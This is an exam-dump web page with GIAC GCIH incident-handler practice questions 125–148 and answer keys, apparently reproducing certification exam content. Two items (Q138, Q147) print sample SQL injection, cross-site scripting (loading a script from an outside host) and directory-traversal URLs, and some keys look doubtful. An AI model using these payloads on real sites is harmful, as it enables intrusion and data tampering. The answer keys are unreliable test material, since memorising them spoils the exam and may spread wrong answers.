[Aug-2023 Newly Released] GCIH Dumps for GIAC Information Security Certified [Q125-Q148]

[Aug-2023 Newly Released] GCIH Dumps for GIAC Information Security Certified

Updated Verified GCIH dumps Q&As - 100% Pass

GIAC GCIH (GIAC Certified Incident Handler) Certification Exam is designed to test and validate the skills and expertise of professionals who are responsible for managing and responding to security incidents. It is a highly respected and widely recognized certification program that is offered by the Global Information Assurance Certification (GIAC) organization. The GCIH certification exam is a rigorous test that assesses a candidate's knowledge of incident handling, incident response, and digital forensics.

 

NEW QUESTION # 125
CORRECT TEXT
Fill in the blank with the appropriate name of the rootkit.
A _______ rootkit uses device or platform firmware to create a persistent malware image.

Answer:

Explanation:
firmware

NEW QUESTION # 126
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-
secure.com. He performs Web vulnerability scanning on the We-are-secure server. The output of the scanning test is
as follows:
C:\whisker.pl -h target_IP_address
-- whisker / v1.4.0 / rain forest puppy / www.wiretrip.net -- = - = - = - = - =
= Host: target_IP_address
= Server: Apache/1.3.12 (Win32) ApacheJServ/1.1
mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22
+ 200 OK: HEAD /cgi-bin/printenv
John recognizes /cgi-bin/printenv vulnerability ('Printenv' vulnerability) in the We_are_secure server. Which of the
following statements about 'Printenv' vulnerability are true?
Each correct answer represents a complete solution. Choose all that apply.

• A. The countermeasure to 'printenv' vulnerability is to remove the CGI script.
• B. With the help of 'printenv' vulnerability, an attacker can input specially crafted links and/or other malicious scripts.
• C. 'Printenv' vulnerability maintains a log file of user activities on the Website, which may be useful for the attacker.
• D. This vulnerability helps in a cross site scripting attack.

Answer: A,B,D

NEW QUESTION # 127
Which of the following techniques is used when a system performs the penetration testing with the objective of accessing unauthorized information residing inside a computer?

• A. Biometrician
• B. Port scanning
• C. Van Eck Phreaking
• D. Phreaking

Answer: B

NEW QUESTION # 128
Which of the following threats is a combination of worm, virus, and Trojan horse characteristics?

• A. Blended
• B. Heuristic
• C. Rootkits
• D. Spyware

Answer: A

Explanation:
Section: Volume C
Explanation/Reference:

NEW QUESTION # 129
Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealth at this point.
Which of the following type of scans would be most accurate and reliable?

• A. TCP Connect scan
• B. Fin scan
• C. UDP sacn
• D. ACK scan

Answer: A

Explanation:
Section: Volume A

NEW QUESTION # 130
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He has successfully completed the following steps of the pre-attack phase:
l Information gathering
l Determining network range
l Identifying active machines
l Finding open ports and applications
l OS fingerprinting
l Fingerprinting services
Now John wants to perform network mapping of the We-are-secure network. Which of the following tools can he use to accomplish his task?
Each correct answer represents a complete solution. Choose all that apply.

• A. NeoTrace
• B. Ettercap
• C. Cheops
• D. Traceroute

Answer: A,C,D

NEW QUESTION # 131
Which of the following programs is used for bypassing normal authentication for securing remote access to a
computer?

• A. Worm
• B. Adware
• C. Spyware
• D. Backdoor

Answer: D

NEW QUESTION # 132
OutGuess is used for __________ attack.

• A. SQL injection
• B. Man-in-the-middle
• C. Steganography
• D. Web password cracking

Answer: C

NEW QUESTION # 133
Which of the following is used to determine the operating system on the remote computer in a network environment?

• A. Spoofing
• B. Reconnaissance
• C. OS Fingerprinting
• D. Social engineering

Answer: C

NEW QUESTION # 134
Which of the following statements are true about tcp wrappers?
Each correct answer represents a complete solution. Choose all that apply.

• A. tcp wrapper protects a Linux server from IP address spoofing.
• B. tcp wrapper allows host or subnetwork IP addresses, names and/or ident query replies, to be used as tokens to filter for access control purposes.
• C. When a user uses a TCP wrapper, the inetd daemon runs the wrapper program tcpd instead of running the server program directly.
• D. tcp wrapper provides access control, host address spoofing, client username lookups, etc.

Answer: B,C,D

Explanation:
Section: Volume A

NEW QUESTION # 135
The IT administrator wants to implement a stronger security policy. What are the four most important security priorities for PassGuide Software Systems Pvt. Ltd.?

• A. Providing secure communications between the overseas office and the headquarters.
• B. Preventing denial-of-service attacks.
• C. Implementing Certificate services on Texas office.
• D. Protecting employee data on portable computers.
• E. Ensuring secure authentication.
• F. Providing two-factor authentication.
• G. Preventing unauthorized network access.
• H. Providing secure communications between Washington and the headquarters office.

Answer: A,D,E,G

NEW QUESTION # 136
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the
network of the company from all possible entry points. He segmented the network into several subnets and installed
firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out
except the ports that must be used. He does need to have port 80 open since his company hosts a website that must
be accessed from the Internet. Adam is still worried about the programs like GIACing2 that can get into a network
through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using
GIACing2 to scan his internal network?

• A. Block ICMP type 3 messages
• B. Block all outgoing traffic on port 21
• C. Block all outgoing traffic on port 53
• D. Block ICMP type 13 messages

Answer: D

NEW QUESTION # 137
Which of the following statements are true about worms?
Each correct answer represents a complete solution. Choose all that apply.

• A. One feature of worms is keystroke logging.
• B. Worms cause harm to the network by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.
• C. Worms can exist inside files such as Word or Excel documents.
• D. Worms replicate themselves from one system to another without using a host file.

Answer: B,C,D

NEW QUESTION # 138
Which of the following HTTP requests is the SQL injection attack?

• A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999
• B. http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f% 2fwww.yourser ver.c0m %2fbadscript.js%22%3e%3c%2fscript%3e
• C. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
• D. http://www.myserver.com/search.asp?lname=adam%27%3bupdate%20usertable%20set% 20pass wd%3d %27hCx0r%27%3b--%00

Answer: D

NEW QUESTION # 139
Which of the following types of malware can an antivirus application disable and destroy?
Each correct answer represents a complete solution. Choose all that apply.

• A. Crimeware
• B. Virus
• C. Adware
• D. Rootkit
• E. Worm
• F. Trojan

Answer: B,D,E,F

NEW QUESTION # 140
Adam works as a Senior Programmer for Umbrella Inc. A project has been assigned to him to write a short program to
gather user input for a Web application. He wants to keep his program neat and simple. His chooses to use printf(str)
where he should have ideally used printf("%s", str).
What attack will his program expose the Web application to?

• A. SQL injection attack
• B. Format string attack
• C. Cross Site Scripting attack
• D. Sequence++ attack

Answer: B

NEW QUESTION # 141
In which of the following attacking methods does an attacker distribute incorrect IP address?

• A. Man-in-the-middle
• B. DNS poisoning
• C. Mac flooding
• D. IP spoofing

Answer: B

NEW QUESTION # 142
You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. You are
working as a root user on the Linux operating system. Your company is facing an IP spoofing attack. Which of the
following tools will you use to get an alert saying that an upcoming IP packet is being spoofed?

• A. Despoof
• B. Dsniff
• C. ethereal
• D. Neotrace

Answer: A

NEW QUESTION # 143
When you conduct the XMAS scanning using Nmap, you find that most of the ports scanned do not give a response.
What can be the state of these ports?

• A. Closed
• B. Open
• C. Filtered

Answer: B

NEW QUESTION # 144
Adam works as a Penetration Tester for Umbrella Inc. A project has been assigned to him check the security of
wireless network of the company. He re-injects a captured wireless packet back onto the network. He does this
hundreds of times within a second. The packet is correctly encrypted and Adam assumes it is an ARP request packet.
The wireless host responds with a stream of responses, all individually encrypted with different IVs.
Which of the following types of attack is Adam performing?

• A. Network injection attack
• B. MAC Spoofing attack
• C. Caffe Latte attack
• D. Replay attack

Answer: D

NEW QUESTION # 145
You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws?

• A. Vulnerability scanning
• B. Manual penetration testing
• C. Automated penetration testing
• D. Code review

Answer: A

NEW QUESTION # 146
Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you
will definitely install the game on your computer. He picks up a Trojan and joins it with chess.exe. Which of the
following tools are required in such a scenario?
Each correct answer represents a part of the solution. Choose three.

• A. NetBus
• B. Absinthe
• C. Chess.exe
• D. Yet Another Binder

Answer: A,C,D

NEW QUESTION # 147
Which of the following HTTP requests is the SQL injection attack?

• A. http://www.myserver.com/search.asp?lname=adam%27%3bupdate%20usertable%20set% 20pass wd
  % 3d %27hCx0r%27%3b--%00
• B. http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%
  2fwww.yourser ver.c0m %2fbadscript.js%22%3e%3c%2fscript%3e
• C. http://www.victim.com/example?accountnumber=67891&creditamount=999999999
• D. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al

Answer: A

NEW QUESTION # 148
......

GIAC GCIH exam covers a wide range of topics such as incident handling process, network protocols, malware analysis, intrusion detection, and response. GCIH exam is designed to test the candidate's ability to detect, analyze, and respond to security incidents efficiently. GIAC Certified Incident Handler certification program is designed for professionals who are involved in incident handling, response, and management, such as security analysts, incident responders, security engineers, and security consultants. GIAC Certified Incident Handler certification program is also suitable for those who wish to enhance their cybersecurity skills and knowledge.

 

Latest GCIH Exam Dumps GIAC Exam from Training: https://www.pdfdumps.com/GCIH-valid-exam.html

New 2023 Latest Questions GCIH Dumps - Use Updated GIAC Exam: https://drive.google.com/open?id=1naY0qJ2dXCJF9KergOc5rFmXQxcPXE8_